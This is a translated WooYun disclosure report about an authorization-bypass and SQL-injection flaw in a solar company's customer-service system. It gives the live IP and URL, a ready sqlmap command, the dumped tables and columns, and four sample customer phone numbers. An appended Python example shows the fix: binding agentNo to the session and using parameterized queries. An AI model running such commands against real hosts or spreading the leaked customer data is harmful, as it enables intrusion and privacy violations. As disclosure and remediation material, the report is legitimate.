Vulnerability summary

Defect ID: wooyun-2015-0145726

Title: 亿家能太阳能 (Yijianeng Solar): authorization bypass / SQL injection in one system leaks 510K customer records (names, addresses, phone numbers, installation orders, etc.)

Vendor: 亿家能太阳能

Author: 路人甲

Submitted: 2015-10-10 12:05

Fix deadline: 2015-11-24 12:06

Published: 2015-11-24 12:06

Vulnerability type: SQL injection

Severity: High

Self-assessed Rank: 18

Status: vendor could not be contacted, or the vendor actively ignored the report

Source: http://www.wooyun.org; for questions or help contact [email protected]



Vulnerability details

Disclosure status:

2015-10-10: Actively contacting the vendor and waiting for it to claim the report; details not yet public
2015-11-24: The vendor has actively ignored the vulnerability; details disclosed to the public

Brief description:

Anyway, I don't use a solar water heater.

Detailed description:

亿家能太阳能 customer service system

http://218.56.138.156:8080/web/manager/


An authorization-bypass (IDOR) URL exists:

http://218.56.138.156:8080/web/servlet/vistor?type=vistorBuilding&agentNo=123456


K1.png


k2.png


The agentNo parameter can be changed to any value, so any agent's records can be read.
The same parameter is also a SQL injection point:

sqlmap.py -u "http://218.56.138.156:8080/web/servlet/vistor?type=vistorBuilding&agentNo=654321" --dbs


k3.png


The current database is ecs

K4.png


Listing tables and row counts:

Database: ecs
+--------------------------------+---------+
| Table | Entries |
+--------------------------------+---------+
| dbo.chanpinxinxi | 1232569 |
| dbo.salebill | 989634 |
| dbo.fahuoxinxi | 971554 |
| dbo.vistorBack | 518859 |
| dbo.building | 515518 |
| dbo.ProductSwap | 407312 |
| dbo.UserTable | 212813 |
| dbo.callerWorkStat | 150036 |
| dbo.LinkTelArea | 138625 |
| dbo.telInfo | 138280 |
| dbo.AssessmentFactorInfo | 42993 |
| dbo.SettleAccountsItems | 36245 |
| dbo.HistorySettleAccountsItems | 17834 |
| dbo.Tmp | 16654 |
| dbo.xilieinfo | 7161 |
| dbo.city | 3238 |
| dbo.UserRole | 2595 |
| dbo.refer | 2584 |
| dbo.Pd_Process | 2582 |
| dbo.pd | 2484 |
| dbo.v_goods | 2445 |


Work-order return-visit table:

vistorBack


K5.png


Listing columns:

Table: vistorBack
[32 columns]
+------------------+---------+
| Column | Type |
+------------------+---------+
| AgentNo | varchar |
| BuildingResult | varchar |
| callTel | varchar |
| Card | varchar |
| content | varchar |
| firstVistorDate | varchar |
| Id | bigint |
| Isbw | int |
| IsDel | varchar |
| Isgd | int |
| Ispj | int |
| IsVisitor | varchar |
| LeaveBillNo | varchar |
| LeaveBillNo2 | varchar |
| memom | varchar |
| openTime | varchar |
| operateDate | varchar |
| other | varchar |
| Province | varchar |
| Reason | varchar |
| require | varchar |
| satisfaction | varchar |
| secondVistorDate | varchar |
| ServiceType | varchar |
| thirdVistorDate | varchar |
| verify | int |
| verifyContent | varchar |
| verifyDate | varchar |
| verifyPerson | varchar |
| verifyValidate | int |
| VistorTime | varchar |
| zt | varchar |
+------------------+---------+


Customer information is involved; sample data from the phone-number column:

Database: ecs
Table: vistorBack
[4 entries]
+--------------+
| callTel |
+--------------+
| 051683202555 |
| 83686959 |
| 85696735 |
| 87792024 |
+--------------+

Proof of vulnerability:

皇明太阳能 (Himin Solar) customer service system

http://218.56.138.156:8080/web/manager/



Fix recommendation:

Filtering
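As an added, defender-side illustration (not code from the report, the vendor, or WooYun), here are the two controls that "filtering" has to mean concretely for this endpoint: the server binds agentNo to the authenticated session instead of trusting the URL, and passes it to the database as a bound parameter rather than concatenating it into SQL. Table, column and handler names are constructed after the vistorBack table and vistor servlet above; SQLite stands in for the site's MSSQL backend, and the sample rows are made up.

```python
import sqlite3

# Constructed stand-in for ecs.dbo.vistorBack. The real backend is MSSQL
# (dbo. prefix); SQLite is used here only so the example runs offline.
def build_db():
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE vistorBack (Id INTEGER PRIMARY KEY, "
                 "AgentNo TEXT, callTel TEXT, BuildingResult TEXT)")
    conn.executemany(
        "INSERT INTO vistorBack (AgentNo, callTel, BuildingResult) VALUES (?, ?, ?)",
        [("123456", "0000-0001", "ok"), ("123456", "0000-0002", "pending"),
         ("654321", "0000-0003", "ok")])  # constructed sample rows
    return conn

def vistor_building_unsafe(conn, agent_no):
    # The reported pattern: the caller-supplied agentNo is neither checked
    # against the session nor bound as a parameter, so it reaches the SQL parser.
    sql = ("SELECT Id, callTel, BuildingResult FROM vistorBack "
           "WHERE AgentNo = '" + agent_no + "'")
    return conn.execute(sql).fetchall()

def vistor_building_safe(conn, session_agent_no, agent_no):
    # 1. Authorization: the server-side session, not the request parameter,
    #    decides whose records may be read (closes the IDOR).
    if agent_no != session_agent_no:
        raise PermissionError("agentNo does not belong to this session")
    # 2. Parameterized query: input travels as a bound value, never as SQL
    #    text (closes the injection).
    sql = ("SELECT Id, callTel, BuildingResult FROM vistorBack "
           "WHERE AgentNo = ?")
    return conn.execute(sql, (agent_no,)).fetchall()

def run_demo():
    """Exercise both handlers and return what a reviewer would check."""
    conn = build_db()
    out = {"own_rows": len(vistor_building_safe(conn, "123456", "123456"))}
    try:
        vistor_building_safe(conn, "123456", "654321")
        out["cross_agent_blocked"] = False
    except PermissionError:
        out["cross_agent_blocked"] = True
    # A quote in the value is harmless once bound as a parameter ...
    out["quote_bound_rows"] = vistor_building_safe(conn, "12'34", "12'34")
    # ... but in the concatenated query it is parsed as SQL and breaks the statement.
    try:
        vistor_building_unsafe(conn, "12'34")
        out["quote_reaches_parser"] = False
    except sqlite3.OperationalError:
        out["quote_reaches_parser"] = True
    return out
```

Calling run_demo() shows the hardened handler returning only the session's own rows, refusing a foreign agentNo outright, and treating a quote in the value as data, while the concatenated version lets that same quote reach the database parser.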

Copyright notice: when reposting, please credit the source as 路人甲@乌云


Vulnerability response

Vendor response:

The vendor could not be contacted, or the vendor actively refused to respond

Vulnerability Rank: 15 (WooYun rating)